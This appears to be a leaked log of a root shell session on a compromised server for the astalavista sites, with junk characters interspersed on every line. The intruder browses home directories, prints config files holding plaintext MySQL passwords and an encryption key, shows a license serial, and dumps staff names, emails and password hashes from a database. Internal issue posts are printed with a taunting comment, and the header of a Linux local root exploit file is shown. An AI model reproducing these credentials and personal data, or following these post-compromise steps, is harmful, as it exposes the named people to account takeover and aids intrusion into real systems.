-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile, f: a  o* x8 k' g3 X
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc, I: X+ Y/ u( ~8 M
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains. i" g; `$ v( V
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap" m' G/ X& ~- Q9 [( H6 v+ a
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
( x# C. P+ V" R6 i% ^% [! |& h7 i4 h7 w  M-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
# ]& }4 ~; x7 [, nlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
# W# T6 }; K3 ]4 ?0 O6 p-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow. f: g$ G. i, X

8 a# r1 e: }+ i( l* G/ l3 t" A1 ]sh-3.2# cd auth/
( c# t5 b4 w. p0 U5 f- u4 `# {0 ysh-3.2# ls -la3 U6 P/ M4 F, M7 S* F+ C& B
total 28' z+ O1 r- l9 }
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
9 B( }% m( b7 Rdrwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..
6 H, v% w+ q4 s4 ?% V-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
/ J* \. n/ p; }* O% N' O-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php: z2 \! u( g4 N3 [
-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd% V3 t, u6 R& I4 ?7 K" I
-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting! p- o7 J6 K9 I3 H
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
% K) z  d* h+ N% W; U% H# x/ [( T# }; i3 O: R+ P/ A9 U
sh-3.2# cat hackercontest.config.inc.php
0 h0 j) C0 i% o- E! Q% a<?PHP
. ^4 C) X& v) d& W// Variabeln f?r Verbindung zur Datenbank //5 M$ i! `: N5 o/ a0 E' f9 C- `, D
$conxHost = ‘localhost’;                       // MySQL hostname
& C0 ~% R4 `3 e% G$conxUser = ‘hackercontest’;                                       // MySQL user9 ~, c2 S  ^0 a" h( u- u
$conxPassword = ‘K6m@7dUc’;                    // MySQL password: C! _' e8 N/ K. D! w
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
8 U3 L+ v$ W) o2 Z?>
6 q" ?) p5 U, s# l$ p- nsh-3.2# cat hosting.config.inc.php
% `4 S" l1 A1 ?<?PHP  {' i: w, @8 \# A' f
// Variabeln f?r Verbindung zur Datenbank //  ~  I% j% P" v9 W3 [$ ]/ ^# ], k
$conxHost = ‘localhost’;                       // MySQL hostname- j* j0 x  L8 v8 M0 R& S
$conxUser = ‘hostinguser’;                                 // MySQL user
. s6 i0 W0 T( b5 N4 P/ r- r. \$conxPassword = ‘cXvB3981′;                    // MySQL password2 G9 a1 _$ {) \
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish; U2 Q% S9 x! M9 x  |+ n
?>
. Z- M! o7 b  u& f1 e. r! V% k: @
sh-3.2# cd ... k7 H; K* }% H
sh-3.2# cd com
2 g7 ?1 S; V4 V0 _# e( d  Osh-3.2# ls -la1 n* }6 ~( ~8 U. J
total 141208
$ ^: M5 _4 ~% w( n: Ndrwx–x–x 10 com  com       4096 Apr 28 12:40 .
' ]4 `; `3 T4 j$ rdrwxr-xr-x 14 root root      4096 Mar 11 17:56 ..$ T, k' b% ^: S
drwx——  2 com  com       4096 Jun  4 04:04 backups- z  ?8 p$ x2 h) I) B
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
; F! k# {, H/ B1 I0 }$ k0 s; ~' g2 Idrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
7 S! n/ ]0 p, d/ q% `* S-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history
. m$ Y. u+ u6 w  W8 d. O3 I0 E-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout
: ~6 @! Y5 A$ W-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
. m- O1 F2 J( B' \& @% q! C/ n-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
. A( e5 N2 o3 S# j, ]drwx–x–x  3 com  com       4096 Jan 29  2008 domains/ J8 |+ R) b& @4 G# `0 h
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed: s% m1 [: w6 z) N' m+ O
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap: u3 ^5 i& v$ V0 H, z( r3 a! t
-rw——-  1 com  com         69 Nov 18  2008 .lesshst, |+ j8 g+ b' s, g1 ?
drwx——  2 com  com       4096 Sep 24  2007 mail, Y3 g& X) G! s$ o  u* E! h8 @
-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history- f6 W  W! [2 ?# j! j7 Y, w
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
) l6 B$ n- Z+ H) u% B3 g. w  q. clrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
! G+ `% g7 \1 @% J8 z" F-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
, M2 |, J3 [7 O8 T/ @9 k6 S2 Wdrwx——  2 com  com       4096 Aug 26  2008 .ssh' p0 r6 J& k6 R9 t; _! Z+ B8 ~9 l
-rwx——  1 com  com       8515 Feb 10  2008 t
0 W: A7 |# C! Q) E* o1 I-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
9 ~" R- _: {2 c$ ?# x5 h8 {5 h0 U  Adrwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp2 C% S2 Y* W0 A- M9 g
-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
0 l7 @1 t0 q6 c, p9 A& e6 q-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql2 C' w" D+ [1 \" W2 `8 @: P
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
, ]2 X, z9 M; r-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
; w5 y2 v7 r8 w- J  r, ?: K3 g
5 e3 `7 _( Z6 g4 W+ `. q* S  Ssh-3.2# head t.c
0 o7 s/ ?( O/ S: r* q/*( G! z' R# G. \! N% j
* jessica_biel_naked_in_my_bed.c
% Y( X% B! e/ O4 k3 @/ C  j1 S  m7 ~*# o4 D  o2 v; W
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura." J: l# G. N1 s& q* q4 v
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.+ @) o3 C( d4 V% Z: ]1 f
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
: l9 t; L2 [7 u( N! c" l- ?*$ W8 M" J! X5 {
* Linux vmsplice Local Root Exploit
4 A2 j9 A! m) j( g3 L2 O* By qaaz+ L9 Y5 H% _6 l7 o6 T4 h# H+ U; F4 _
*& K* |0 k3 v/ e% S* p. y

( P5 g* D' ~) W( {sh-3.2# cd /
, @; C5 x9 ~: jsh-3.2# ls -la* ?  J! X8 {3 N9 I7 D
total 360
$ P5 s. {+ m" F3 v6 R6 i+ adrwxr-xr-x  25 root root   4096 Jun  3 02:43 .4 q6 M( c1 U" s7 O7 p: H9 s0 D
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..: I1 T4 }* ?' r% s$ h
-rw——-   1 root root  10240 Jun  3 02:39 aquota.group# p0 s3 Z( Q* N; F/ B
-rw——-   1 root root  10240 Jun  3 02:39 aquota.user5 W3 J  T/ f  K. W' N0 `0 m
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db" ]" ~- L+ n  I" l
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck% I* z0 \6 f( G5 p: r
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel# W) [( R, {- ^  p+ _) o- b8 c; q
drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
* C$ \+ G) {1 w* x; }$ Zdrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
6 O$ U$ Z* {, k# a" R# Tdrwxr-xr-x   5 root root   4096 Jun  2 14:06 boot! F9 `& i& [) j/ M2 N7 ]
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev/ c* x4 @: N5 m% J! |) n
drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
7 M  U9 F. b2 edrwxr-xr-x  14 root root   4096 Mar 11 17:56 home+ G9 d0 E- j7 E. V
-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf8 h- w6 d  d: t* Q
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib% z1 o6 N6 K- R7 }# [
drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64% _0 V' V/ V  B% b0 ^
drwx——   2 root root  16384 Sep 11  2007 lost+found& W* D# \2 p# V! R* j/ A# V
drwxr-xr-x   2 root root   4096 Mar 11 17:56 media4 }' f& l3 o2 R5 E! U& Q0 H
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
7 Q! E; Q' i' U( hdrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
) O* x) l4 g! z) |0 U# ^/ N-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg
" w* r7 e5 v# }4 tdrwxr-xr-x   2 root root      0 Jun  3 02:43 net
, q; M" D/ D0 ]6 \drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
8 I: r6 }4 @* t0 [dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
0 \2 K) b  y+ E* edrwxr-x—  15 root root   4096 Jun  4 08:40 root" f/ T9 c1 R2 k$ t& R
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
) l1 N7 g. q) C6 Gdrwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
: u& R* `) _& v7 [9 odrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv, X, d% T$ \4 k8 h1 _6 W
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys7 m1 u$ d% N! }4 Q6 N7 C7 Z0 W
drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
* S6 M6 h; x" O3 Gdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
4 I! f5 {& a, w. ^) Z3 h( @& f: U9 x/ Fdrwxr-xr-x  26 root root   4096 Jun  4 03:16 var4 M& z: T2 t: n/ @% B, p
, }3 _) Y6 A' D9 H. f: f
sh-3.2# cd opt% P5 \7 o7 \; O1 t. K* O
sh-3.2# ls -la
- p) G+ T& ]# Q; a3 e* o8 Ntotal 20) C/ Y5 U) {  V! s! E! H: w
drwxr-xr-x  3 root root 4096 Mar 11 17:56 .9 p& `- N/ q% b8 B/ ]" j/ v1 G
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..4 d" A, G6 E- |# i% ~5 a: ~
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws( z: d3 P7 Z  B+ r, y* z

) M0 U1 B! `/ H: c& P" w( ysh-3.2# cd lsws/
' b+ D# Q0 X9 y6 e# V; Hsh-3.2# ls -la
/ E2 U1 H" R- G7 N3 n' O, R& \' R* gtotal 108
1 c' L8 n) n3 }/ \. x+ `drwxr-xr-x 15 root   root    4096 Mar 20  2008 .: K+ U. u0 k2 ]; g
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
3 |* |( {+ A+ H! Jdrwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons3 m( b7 m& @# c
drwxr-xr-x 13 root   root    4096 May 29 15:10 admin6 Y% p! ?4 d+ d# w7 `
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate. B- O5 X  ~4 b6 Q6 x+ C% o
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin& q1 F. R0 o& n- v# r
drwx——  4 apache apache  4096 Jun  3 02:43 conf
( ^, V7 B7 G( z" G. C* fdrwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT: u3 j6 P1 Q2 m" `) g
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
$ a3 t0 X) g' ?1 Odrwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
+ w0 [  _7 b$ zdrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib; i' X, x" c+ D% n
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE! E  l: F/ C+ f: o: `
-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP$ }9 ^. l0 ?+ b: H
-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL# T& }6 ?% d" i9 i4 L7 h; f
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP
$ t+ w! e! e/ Y3 T) @4 Cdrwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs- @7 z7 I' q( `8 u
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php/ G' n8 G9 C8 b
drwx——  2 apache apache  4096 Mar 20  2008 phpbuild$ @  ]0 p+ X# E& Z: c& ~
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share1 v9 G! i7 N& Z3 n1 f
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION
  Z- u! w6 T0 ]& S6 r( E
/ w: Y5 j: g9 U5 Osh-3.2# cd conf
: q( l1 d0 t/ c  o# msh-3.2# ls -la+ N9 c0 L1 J5 t0 K: n6 y2 b
total 48' w3 b+ d% v. {
drwx——  4 apache apache 4096 Jun  3 02:43 .
+ R: c( K2 M4 F. Z* x. \+ Pdrwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
! J- ]7 [& [( G, e# T/ w4 I2 qdrwx——  2 apache apache 4096 Mar 20  2008 cert; r$ w% n5 i0 F8 @! }
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml: g$ r/ g+ g$ f$ m" Z- M
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak; q7 b% R- R  q& D: n3 h4 b  O+ g! y
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
; t, V& @/ l6 G* n) x5 w$ P-rw——-  1 apache apache  256 May 29 15:10 license.key
7 W6 B7 s7 n* O- w9 W! b# Q4 D-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
0 V* O+ d3 Z/ f# O, g0 m# A% h! _& w-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties9 \" z* A% v* S( u! L9 O
-rw——-  1 apache apache   20 May 29 15:10 serial.no
/ S/ V5 ?- N7 f+ ^1 }" L! bdrwx——  2 apache apache 4096 Mar 20  2008 templates9 j$ K' i+ \$ Q, Z" T8 g
5 j" U' ~$ V  ]$ {
sh-3.2# cat serial.no2 p& W2 T4 p- ^# u
IbDl-oVsO-CKqL-wVRa' N% Z* A( U( _" H

9 ^% V6 q: `( A* I# L9 q; O8 Lsh-3.2# mysql
! W0 _7 s8 p, hWelcome to the MySQL monitor.  Commands end with ; or \g." R: G% i( e9 f  t0 S; m
Your MySQL connection id is 286844/ s) W9 O  h) b
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
% V% z- s4 O- T. m4 a+ S+ c4 b+ }1 |# p1 ^. t! a
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
' j: D1 A2 o1 |, z! N" R* i
- Z( a) F6 B( k, E; fmysql> show databases;
$ m& E* Z. ~& n( B, [+———————–++ E# v2 J  K* c: Z4 }& O, n( L+ f
| Database              |
( J; I( m* v: O( c7 K5 ^+———————–+
; b5 d, c. ]7 @4 g| information_schema    |
8 H% T9 X7 t# u) G& w8 S| astanet_ads           |
( [, H* b$ d) S8 j5 p| astanet_mailing_lists |
  T! S( z/ n& [| astanet_mediawiki     |
( j+ B+ j$ R9 D8 @8 R% O2 J$ h| astanet_membersystem  |. N. j0 ^1 ?6 n% x. W& g
| com_contrexx          |
& {5 ?" z$ f  D| com_contrexx2         |
  q. Z( ?4 h. `" I| com_contrexx2_live    |
! a0 V2 g. E* ~1 z2 @| da_roundcube          |! G5 F$ a4 k# Q5 ^' ^" |8 R
| dolphin               |
% t* Z1 H6 i* F. n5 h5 s, `| ideapool              |# h, ^- X' l. ^* D; p. H# l
| mysql                 |
6 s' R- F, k1 c5 l3 \) l$ _| test                  |9 h$ Y2 W# ?1 l# L
| yourmaster            |
9 L4 Y; i+ A/ `. \9 y" T+———————–+
0 U- T0 `. [3 C7 A" }0 j. C14 rows in set (0.00 sec)
- l+ U+ @' q9 n7 e( u* X
1 R. t/ r3 `9 b4 A' L; J, d6 Pmysql> use ideapool
3 f0 Z! S6 R. s7 kDatabase changed& S; z. K9 I* n1 M* b/ f6 Q
mysql> show tables;: c- h, J! k9 r5 z
+———————————–+
% c. T4 x- C( U7 p  O  U, h| Tables_in_ideapool                |
2 Z* W. }/ I3 o/ F' @' Q+ {+———————————–+# P8 n9 h5 E: B7 i0 v3 t# i
| eventum_columns_to_display        |- B7 f- l# ?; O$ m! Z
| eventum_custom_field              |, ^8 S7 ?  N" g3 H# J4 F- f
| eventum_custom_field_option       |
. [% t, i/ E% S| eventum_custom_filter             |
& [4 A& B" K! |6 g| eventum_customer_account_manager  |7 F6 S+ x7 ]- D- z$ x$ u
| eventum_customer_note             |% G2 K- A4 \5 l7 a8 v
| eventum_email_account             |; n9 }  t& v3 s. ~
| eventum_email_draft               |
) V4 H2 i! K8 M# |- a8 M8 j, a| eventum_email_draft_recipient     |
2 N1 F0 F8 ^4 P9 E/ y( k, g- v| eventum_email_response            |* Z, C5 O4 X+ y$ {" U9 G3 f& s2 g
| eventum_faq                       |- j. n6 b6 K) l! M5 w
| eventum_faq_support_level         |/ q5 p. P0 H( }* J0 ~7 ^
| eventum_group                     |/ f# P! o8 M) [0 P0 r1 Y0 d. B
| eventum_history_type              |3 C& n7 K6 d/ h5 ~' f9 M5 ]% \- m
| eventum_irc_notice                |
7 E) B, o! |) {0 K| eventum_issue                     |
2 H7 e: C% E) Q& ^| eventum_issue_association         |
9 b2 ^$ s. ]1 V' f9 y| eventum_issue_attachment          |, S2 W2 |% W( u) l% [
| eventum_issue_attachment_file     |
0 g' r/ b& m; w( G| eventum_issue_checkin             |
2 x2 ?0 \: `) H, V( j# g- L| eventum_issue_custom_field        |
& s- h% i9 R6 K7 u3 V| eventum_issue_history             |6 Q( i) u% M, d( R& m1 o
| eventum_issue_quarantine          |  b2 S% R* A, `3 `" o) q: Y
| eventum_issue_requirement         |
) b" r  n) q( Y+ I; H! d& ~| eventum_issue_user                |7 U; i! a, ~3 J* I3 t
| eventum_issue_user_replier        |
6 A! H1 j0 {# S) Y2 ]; v| eventum_link_filter               |0 T4 |5 |! H+ D1 C% D/ V! j
| eventum_mail_queue                |
6 g6 i: B7 t& K0 b$ d  {+ H, ]- n9 ]| eventum_mail_queue_log            |5 Q. ]& m8 S0 q1 \( `! i$ q, _
| eventum_news                      |8 e) G+ t2 V1 R6 a" i+ J* b
| eventum_note                      |
$ S7 G# h# t. J| eventum_phone_support             |
/ ?* c& A: |( b- R$ K% w| eventum_project                   |
- U; n& g- c# F' X: @| eventum_project_category          |5 L4 a3 T6 Q$ ?% ]
| eventum_project_custom_field      |
( S6 F. p- M+ p4 [$ U4 ?| eventum_project_email_response    |
! L! a4 y' p" C5 L| eventum_project_field_display     |
, b' G" ]8 Q/ |6 n" x2 [| eventum_project_group             |
/ H) B9 f: w% n6 y, u% G| eventum_project_link_filter       |4 I0 ]3 h% n  Q; [+ \
| eventum_project_news              |  F' ]/ J4 q: L% v9 M* @5 T2 s2 U
| eventum_project_phone_category    |
' y8 y% a4 ]' H/ G8 i| eventum_project_priority          |
) z, n4 Y# }. H0 ^, [( b0 @  _( e| eventum_project_release           |
4 [! E: \& C1 W5 o. \9 f# G| eventum_project_round_robin       |9 W" Z) c0 U" z# [5 b: f- ~' e/ w
| eventum_project_status            |: ?. x% M& e6 O4 V+ P
| eventum_project_status_date       |
9 o$ x$ \- P% o( @3 B$ U* g| eventum_project_user              |5 R/ F0 x2 b( T5 S, t/ f4 r  v
| eventum_reminder_action           |
$ X; g* D1 {8 N8 y: O/ e/ w| eventum_reminder_action_list      |
7 Q% ?" X9 \8 A3 K0 ]| eventum_reminder_action_type      |$ |/ h' X3 {4 J$ ~6 K+ j
| eventum_reminder_field            |( C8 Y$ y6 _) A( R* C
| eventum_reminder_history          |' u0 \. L9 ?) [( `% W) s  I3 i$ S
| eventum_reminder_level            |7 {! U+ M8 o) ?, A6 M) q
| eventum_reminder_level_condition  |9 U( T, _$ C7 q# B
| eventum_reminder_operator         |, v6 l3 ?+ p. N0 v
| eventum_reminder_priority         |
; O. a' l& U9 \5 `% [" P0 J+ t' a| eventum_reminder_requirement      |
' z! O) u; X9 \' b1 G4 J$ _| eventum_reminder_triggered_action |
/ \" |. ^2 n7 r6 a/ X1 }| eventum_resolution                |
$ R: w- z( J( ^5 W| eventum_round_robin_user          |
& |) a1 v- w4 L8 S| eventum_search_profile            |
/ ]2 n' L: o+ V& ~9 s: H4 n| eventum_status                    |
3 {3 Q+ k" C- \1 i. `, d| eventum_subscription              |; q, _; Z+ B& E8 j. E' J
| eventum_subscription_type         |1 J9 ~" D! B+ N- g) }
| eventum_support_email             |  E) T' |8 L4 F2 I
| eventum_support_email_body        |
" K: b$ p4 A8 g3 \| eventum_time_tracking             |" L- C9 s9 |: d! g
| eventum_time_tracking_category    |
5 o" q4 ~% [3 G- {2 J9 l8 x. ~| eventum_user                      |
* r$ P$ ~9 n) l0 Y: \. r3 g' J+———————————–+
' G% d& H# m$ q# f( r, X69 rows in set (0.00 sec)
, i2 |" u9 v' l+ o
" U' {6 q3 k9 qmysql> describe eventum_user;! D0 y$ Y. V* a/ b$ h% T
+————————-+——————+——+—–+———————+—————-++ A* f5 v1 I5 c7 M0 p. `4 @9 k" G
| Field                   | Type             | Null | Key | Default             | Extra          |
" J% [& d+ A4 l* ]( O+————————-+——————+——+—–+———————+—————-+
, y3 S* z% V9 [| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
0 x) {& t. K) H3 ]- x| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |8 p% A) C7 Q8 Z$ u% ^( B
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
; o. {) ?# }* T! A/ y1 w| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |" A3 K# R+ F8 m5 M9 q6 r) K0 \
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |6 _/ S/ E5 _) d( O6 `
| usr_status              | varchar(8)       | NO   |     | active              |                |1 e6 M" x, a3 x0 d, k
| usr_password            | varchar(32)      | NO   |     |                     |                |
& R5 V. M$ e* Q" P! p| usr_full_name           | varchar(255)     | NO   |     |                     |                |
4 F+ n$ R1 `# ~, {' W9 {' {9 ~| usr_email               | varchar(255)     | NO   | UNI |                     |                |5 g$ h5 v3 E" q7 K
| usr_preferences         | longtext         | YES  |     | NULL                |                |/ a) T; A; r! `1 V
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
( o# L8 i) M+ E4 n- g& I% Y| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |  k7 v7 e; j  A3 T! z
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
2 q0 b# R4 a* K( C4 O* N; [, P- R+————————-+——————+——+—–+———————+—————-+6 s& j$ ]% T/ Q# o8 p* \& d
13 rows in set (0.00 sec)
( [. p5 \& N3 {4 _" N& X$ u" Z, ?, e% p  k8 C/ Y
mysql> select usr_full_name,usr_email,usr_password from eventum_user;  w# h2 q4 P, C2 k5 N
+———————-+——————————-+———————————-+
% y8 n" @8 c* t; v0 k| usr_full_name        | usr_email                     | usr_password                     |/ {7 i' B" s8 t' P) g  T7 I
+———————-+——————————-+———————————-+! H. a1 {9 c; X6 C' P
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |" E1 I/ R. ?1 N8 t
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |9 {5 }+ C/ o( |% w
| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
) R; _0 |" U6 V7 \) P+ A2 l| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |* H/ {. z: Y( ]3 R
| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
: `, h( E) N( l9 Z5 J6 Y| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |' T* d( |6 q( n  T8 ]# i. d
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |+ F4 g) B3 ~# U9 j  z; P( j
| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |* i' w9 n6 `: T, K; x/ F" J& }
| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |+ h( e% t' v% S! s
| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |4 K2 ]5 |$ k, M; l3 ^3 e) z0 @
| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
, V1 D: i3 r) `| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |9 H$ h  [& |8 [& G/ \2 u/ ]
| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
* m, |2 N6 J4 ^+ n" w' E| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |; |9 H, H. _6 j& B) N4 f' K1 q- F" i
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |* [" O* O+ W; |0 f' ?" g
+———————-+——————————-+———————————-+
6 j; }9 ]9 ]" h5 b/ o! d/ ~15 rows in set (0.00 sec)
: I7 R1 b+ f) A- H  |6 D: H7 a
8 K  D7 X& k1 h/ M3 Y' w+ }$ nmysql> select iss_description from eventum_issue where iss_id = 43;$ D' T: b6 N9 `5 c
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
, M/ s8 ~+ r" d: x1 E, F| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
& N. f$ b" \, i5 A( a) N* a" l& Y|
& E" ?( V! D3 a" G0 K0 @% x3 a+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+( c( Y* T3 z# r& V- D  [' C% {
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
! l0 C  D9 j. S0 w5 nconnected for 90 mins… 120mins… so what i propose is something like:' u& ~: p- t2 `- u3 j3 T  D
链接标记[url]http://www.surfthechannel.com/[/url]
6 u& J1 D2 Z+ X8 ]; Isince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system2 }  s& X- T' q" U+ d" \
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t$ Y6 d# l) q6 J" M
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
9 R% K2 V# V4 ^. A* p5 ~; Zif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…& n4 |% r) l) f
3 O7 c3 r% Z1 W3 ?
We could also put advertisement during play on the flash video player itself… extra $$…5 i9 T+ ~) F3 D) t% k. u
; r; Y! P: \9 E
By sykadul |
3 e( Q% j* r0 B5 ]  S- Y4 z" @2 E+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
" |2 H) w" U3 [4 k! w2 h/ O4 l1 row in set (0.00 sec)2 H- X1 P) `  F9 s8 F& V7 d% ^4 D

) `5 h# \  x+ R( j7 }, I// Money and extra $$ is all they care about. remember that.
+ g9 f% I4 F$ J1 M' X: |7 a! Q  @; w. ]
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;3 ~' P, p. s: N6 f; J
+————————+——————————————————————————————————————————————————————————————————————————————-+
7 Z. X" ~* Y% Y6 `8 e| iss_summary            | iss_description                                                                                                                                                                                                                          
) f  M; o5 d0 ~0 C$ x$ m8 B) s. i|
. B7 d+ V' {! P+————————+——————————————————————————————————————————————————————————————————————————————-+6 q) `9 t% O% W) P# y# T
| Forum for REAL EXPERTS | Hello,
4 p7 A4 F( L4 L, J) m( P
# Q6 ]6 @  c4 R2 T& ]6 eIshtus and I,
. n9 {( Z, C" Z+ G7 a# n! I2 E( n" r2 B0 g/ d( {" U- `
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
; d2 ^0 e" ~( ]  ^* eONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
2 L9 d. Y2 e: @& U& i/ t& F2 f' ~9 x% `1 I/ f) c3 a: F
One example a friend of mine from coresecurity.com!
0 P7 W# i2 J/ T3 q7 C9 i( L8 L
) |8 {- I0 _" hWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
5 R& D9 z+ a, ~0 C7 Z0 ]7 ?% s: ?( j% |& a
|
/ X8 l5 Q! k5 h* Z6 Y1 Q0 A% \/ \0 \+————————+——————————————————————————————————————————————————————————————————————————————+
) w6 a# _! _) H2 l! t2 B1 row in set (0.00 sec)
* C' \+ v! R" s
